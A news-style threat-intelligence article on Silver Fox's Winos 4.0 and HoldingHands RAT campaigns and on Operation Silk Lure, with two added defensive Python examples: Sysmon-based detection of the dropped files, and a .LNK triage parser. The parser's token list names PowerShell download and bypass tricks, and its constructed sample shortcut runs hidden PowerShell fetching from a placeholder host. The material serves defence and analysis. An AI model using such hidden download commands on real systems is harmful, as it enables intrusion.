
The attackers behind the malware family known as Winos 4.0 (aka ValleyRAT) have expanded their targeting from China and Taiwan to Japan and Malaysia using another remote access Trojan (RAT) tracked as HoldingHands RAT (aka Gh0stBins).
“This campaign relied on phishing emails containing PDFs with embedded malicious links,” Pei Han Liao, a researcher at Fortinet’s FortiGuard Labs, said in a report shared with The Hacker News. “These files purported to be official Treasury Department documents and contained numerous links beyond the one distributing Winos 4.0.”
Winos 4.0 is a family of malware that is often spread through phishing and search engine optimization (SEO) poisoning, redirecting unsuspecting users to fake websites disguised as popular software such as Google Chrome, Telegram, Youdao, Sogou AI, WPS Office, and DeepSeek.
The use of Winos 4.0 is primarily associated with an “aggressive” Chinese cybercrime group known as Silver Fox. This group is also tracked as SwimSnake, The Great Thief of Valley (or Valley Thief), UTG-Q-1000, and Void Arachne.
Last month, Check Point reported that the attackers abused a previously unknown vulnerable driver associated with WatchDog Anti-malware in a Bring Your Own Vulnerable Driver (BYOVD) attack aimed at disabling security software on compromised hosts.
Weeks later, in August 2025, Fortinet highlighted another campaign that leveraged SEO poisoning to distribute modules related to HiddenGh0st and Winos malware.
Silver Fox's targeting of Taiwan and Japan with the HoldingHands RAT was documented in June by a cybersecurity firm and by a security researcher known as somedieyoungZZ; in those attacks a phishing email carrying a booby-trapped PDF document triggered a multi-stage infection that ultimately deployed the Trojan.

It’s worth noting at this point that both Winos 4.0 and HoldingHands RAT are inspired by another RAT malware called Gh0st RAT, whose source code was leaked in 2008 and has since been widely adopted by various hacker groups in China.
Fortinet said it identified a PDF document purporting to be a Taiwanese draft tax regulation that contains a URL to a Japanese web page (“twsww[.]Thin/Download[.]html”), from which the victim is prompted to download a ZIP archive that delivers the HoldingHands RAT.
Further investigation uncovered earlier attacks, some dating back to March 2024, that targeted China with a tax-themed Microsoft Excel document as a lure to distribute Winos. More recent phishing campaigns, however, have shifted their focus to Malaysia and use fake landing pages to trick recipients into downloading the HoldingHands RAT.

The starting point is an executable file that claims to be an excise audit document and is used to sideload a malicious DLL. That DLL acts as a shellcode loader for ‘sw.dat’. The payload performs anti-virtual machine (VM) checks, enumerates running processes against a list of Avast, Norton, and Kaspersky security products and terminates any it finds, elevates privileges, and stops the Task Scheduler service.
It also drops the following files into C:\Windows\System32:
- svchost.ini: contains the relative virtual address (RVA) of the VirtualAlloc function
- TimeBrokerClient.dll: the malicious DLL; the legitimate TimeBrokerClient.dll is renamed to BrokerClientCallback.dll
- msvchost.dat: encrypted shellcode
- system.dat: encrypted payload
- wkscli.dll: unused DLL
“Task Scheduler is a Windows service hosted by svchost.exe that allows users to control when certain operations and processes run,” Fortinet said. “Task Scheduler recovery settings are configured by default to restart a service one minute after it fails.”
“When Task Scheduler is restarted, svchost.exe runs and loads the malicious TimeBrokerClient.dll. This trigger mechanism does not require launching the process directly, making behavior-based detection more difficult.”
The main function of “TimeBrokerClient.dll” is to allocate memory for the encrypted shellcode in “msvchost.dat” by calling VirtualAlloc() at the RVA recorded in “svchost.ini”. In the next stage, the “msvchost.dat” shellcode decrypts the payload stored in “system.dat” and retrieves the HoldingHands payload.
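The persistence trick above leaves two observable traces: the dropped artefacts in System32 and the Task Scheduler's svchost.exe host loading a TimeBrokerClient.dll that is not Microsoft-signed. The detection logic below is an added example written for this article, not code from Fortinet or the malware; it assumes Sysmon-style FileCreate (Event ID 11) and ImageLoad (Event ID 7) fields (TargetFilename, Image, ImageLoaded, Signed, Signature), and the JSON sample lines are constructed, not real telemetry from the campaign.

```python
"""Added example: detection logic for the HoldingHands persistence chain
(artefacts dropped into System32, and svchost.exe loading a TimeBrokerClient.dll
that is not Microsoft-signed). Event shapes follow Sysmon's FileCreate (ID 11)
and ImageLoad (ID 7) fields; the sample log lines are constructed."""
import json

SYSTEM32 = "c:\\windows\\system32\\"
# File names the report lists as dropped into System32, plus the renamed original DLL.
DROPPED_NAMES = {"svchost.ini", "msvchost.dat", "system.dat",
                 "wkscli.dll", "brokerclientcallback.dll"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, path) tuples for events that match either rule."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 11:  # FileCreate: one of the known dropped names lands in System32
            target = ev["TargetFilename"].lower()
            if target.startswith(SYSTEM32) and _basename(target) in DROPPED_NAMES:
                alerts.append(("holdinghands_dropped_file", target))
        elif eid == 7:  # ImageLoad: svchost.exe loads TimeBrokerClient.dll
            loaded = ev["ImageLoaded"].lower()
            if (_basename(loaded) == "timebrokerclient.dll"
                    and _basename(ev["Image"]) == "svchost.exe"):
                # The malicious DLL sits at the real path under the real name,
                # so the path alone proves nothing; the Authenticode state does.
                microsoft_signed = (ev.get("Signed") == "true"
                                    and "microsoft" in ev.get("Signature", "").lower())
                if not microsoft_signed:
                    alerts.append(("unsigned_timebrokerclient_load", loaded))
    return alerts


def parse_log(text):
    """Parse JSON-lines telemetry into event dicts."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


# Constructed sample telemetry (JSON lines); not captured from the campaign.
SAMPLE_LOG = r'''
{"EventID": 11, "Image": "C:\\Users\\bob\\Downloads\\audit.exe", "TargetFilename": "C:\\Windows\\System32\\msvchost.dat"}
{"EventID": 11, "Image": "C:\\Users\\bob\\Downloads\\audit.exe", "TargetFilename": "C:\\Windows\\System32\\BrokerClientCallback.dll"}
{"EventID": 11, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\bob\\Documents\\system.dat"}
{"EventID": 7, "Image": "C:\\Windows\\System32\\svchost.exe", "ImageLoaded": "C:\\Windows\\System32\\TimeBrokerClient.dll", "Signed": "false", "Signature": ""}
{"EventID": 7, "Image": "C:\\Windows\\System32\\svchost.exe", "ImageLoaded": "C:\\Windows\\System32\\TimeBrokerClient.dll", "Signed": "true", "Signature": "Microsoft Windows"}
'''

if __name__ == "__main__":
    for rule, path in detect(parse_log(SAMPLE_LOG)):
        print(f"{rule}: {path}")
```

The third and fifth sample lines are deliberate negatives: a system.dat outside System32 and a properly signed TimeBrokerClient.dll load produce no alert, which keeps the rule from firing on the service's normal restart.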
HoldingHands has the ability to connect to a remote server, send host information to the remote server, send a heartbeat signal every 60 seconds to maintain the connection, and receive and process commands issued by the attacker on the infected system. These commands allow the malware to obtain sensitive information, execute arbitrary commands, and download additional payloads.
The latest version adds a new command that lets the operator update the command-and-control (C2) address used for communication via Windows registry entries.
Operation Silk Lure targeting China with ValleyRAT
The development comes as Seqrite Labs reveals details of an ongoing email-based phishing campaign that leverages C2 infrastructure hosted in the United States to target Chinese companies in the fintech, cryptocurrency, and trading platform space and ultimately deliver Winos 4.0. The operation was code-named “Operation Silk Lure” because of its China-related activities.
Researchers Dixit Panchal, Somen Birma and Kartik Jivani said: “Threat actors are creating highly targeted emails masquerading as job seekers and sending them to human resources and technical recruitment teams within Chinese companies.”
“These emails often contain malicious .LNK (Windows shortcut) files embedded in seemingly legitimate resumes or portfolio documents. Once executed, these .LNK files act as droppers and begin executing the payload that facilitates the initial compromise.”
Once launched, the LNK file runs PowerShell code that downloads a decoy PDF resume while silently dropping three additional payloads into “C:\Users\\AppData\Roaming\Security” for execution. The PDF resumes are localized and tailored to Chinese targets to increase the chances of a successful social engineering attack.

The dropped payloads are:
- CreateHiddenTask.vbs: creates a scheduled task that launches “keytool.exe” every day at 8 AM
- keytool.exe: loads jli.dll via DLL sideloading
- jli.dll: malicious DLL that launches the Winos 4.0 malware encrypted and embedded within keytool.exe
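Because the whole Silk Lure chain, from the resume shortcut to the scheduled task that relaunches keytool.exe, hinges on what the .LNK actually executes, the first triage step is to read the shortcut's command line without double-clicking it. The parser below is an added example, not code from Seqrite or the campaign: it follows the MS-SHLLINK layout (76-byte ShellLinkHeader, optional LinkTargetIDList and LinkInfo, then the StringData fields) and flags tokens such as a hidden PowerShell window or a download cmdlet. The sample shortcut is built inline by build_lnk() and is constructed; its command line and the example.invalid host are illustrative and not the campaign's.

```python
"""Added example: a minimal MS-SHLLINK (.lnk) parser for triaging shortcut
droppers. It reads the fixed ShellLinkHeader, skips the optional
LinkTargetIDList and LinkInfo structures, and extracts the StringData fields
(relative path, working directory, arguments) that reveal what really runs.
The sample shortcut is constructed here; its command line is illustrative."""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value droppers use to keep the console out of sight

# Tokens that rarely belong in a legitimate resume or portfolio shortcut.
SUSPICIOUS_TOKENS = ("powershell", "-enc", "-w hidden", "-windowstyle hidden",
                     "bypass", "iwr ", "invoke-webrequest", "downloadstring",
                     "downloadfile", "mshta", "rundll32")


def _read_string(data, off, unicode):
    """StringData item: uint16 CountCharacters followed by that many characters."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if unicode:
        text = data[off:off + 2 * count].decode("utf-16-le")
        off += 2 * count
    else:
        text = data[off:off + count].decode("cp1252", "replace")
        off += count
    return text, off


def parse_lnk(data):
    """Return ShowCommand and whichever StringData fields the shortcut carries."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    (flags,) = struct.unpack_from("<I", data, 20)
    (show_command,) = struct.unpack_from("<I", data, 60)
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (uint16) + IDList
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                # LinkInfoSize (uint32) includes itself
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    info = {"show_command": show_command}
    unicode = bool(flags & IS_UNICODE)
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            info[key], off = _read_string(data, off, unicode)
    return info


def triage_lnk(data):
    """Parse a shortcut and list the indicators that warrant a closer look."""
    info = parse_lnk(data)
    command = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in command]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("window minimised (SW_SHOWMINNOACTIVE)")
    return info, hits


def build_lnk(relative_path, working_dir, arguments, show_command=SW_SHOWMINNOACTIVE):
    """Build a minimal Unicode .lnk (no IDList/LinkInfo) to exercise the parser."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIqqqIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, working_dir, arguments))
    return header + strings


# Constructed sample: a "resume" shortcut that really launches a hidden PowerShell.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"%USERPROFILE%",
    r'-w hidden -ep bypass -c "iwr http://example.invalid/resume.pdf -OutFile $env:TEMP\resume.pdf"',
)

if __name__ == "__main__":
    parsed, indicators = triage_lnk(SAMPLE_LNK)
    print(parsed)
    print("indicators:", indicators)
```

Real-world shortcuts usually carry a LinkTargetIDList and LinkInfo before the strings, which is why the parser skips both by their size fields rather than assuming the strings start at offset 76; a shortcut whose arguments decode to a long base64 blob after -enc deserves decoding before anything else is run.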
“The deployed malware establishes persistence within the compromised system and launches various reconnaissance activities,” the researchers said. “This includes capturing screenshots, collecting clipboard contents, and extracting critical system metadata.”
The Trojan also incorporates various techniques to evade detection, including attempting to uninstall detected antivirus products and terminating network connections associated with security programs such as Kingsoft Antivirus, Huorong, and 360 Total Security to disrupt their normal functioning.
“This leaked information significantly increases the risk of advanced cyber espionage, identity theft, and credential compromise, thereby posing serious threats to both organizational infrastructure and individual privacy,” the researchers added.